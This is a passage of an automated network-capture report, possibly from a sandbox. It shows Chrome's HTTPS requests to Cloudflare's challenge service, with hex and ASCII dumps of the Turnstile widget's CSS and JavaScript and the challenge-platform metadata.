                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                        Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                        Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                        Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                        Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                        Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.1649721104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:22 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:22 UTC441INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:22 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47262
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56adf0a7d439c-EWR
                                                                                                        2024-10-04 13:11:22 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                        Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                        Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                        Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                        Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                        Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                        Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                        Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                        Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                        2024-10-04 13:11:22 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                        Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.1649723104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:23 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56adf1e4c7ce7&lang=auto HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:23 UTC301INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:23 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 117210
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56ae30b964258-EWR
                                                                                                        2024-10-04 13:11:23 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                        2024-10-04 13:11:23 UTC1369INData Raw: 30 68 72 65 66 25 33 44 25 32 32 25 32 33 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 52 65 66 72 65 73 68 25 33 43 25 32 46 61 25 33 45 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72 6f 77 73 65 72 22 3a 22 59 6f 75 72 25 32 30 62 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 6f 75 74 25 32 30 6f 66 25 32 30 64 61 74 65 2e 25 32 30 55 70 64 61 74 65 25 32 30 79 6f 75 72 25
                                                                                                        Data Ascii: 0href%3D%22%23%22%20class%3D%22refresh_link%22%3ERefresh%3C%2Fa%3E","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%
